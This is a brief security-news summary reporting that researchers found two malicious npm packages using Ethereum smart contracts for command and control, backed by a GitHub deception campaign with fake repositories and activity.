Researchers discovered two malicious npm packages using Ethereum smart contracts for C2, marking a new tactic in open source security, with attackers leveraging smart contracts to host malicious commands and making detection harder. The campaign involved extensive GitHub deception, with fabricated repositories and fake activity to lure developers.
Latest mentioned: 09-09
Earliest mentioned: 09-03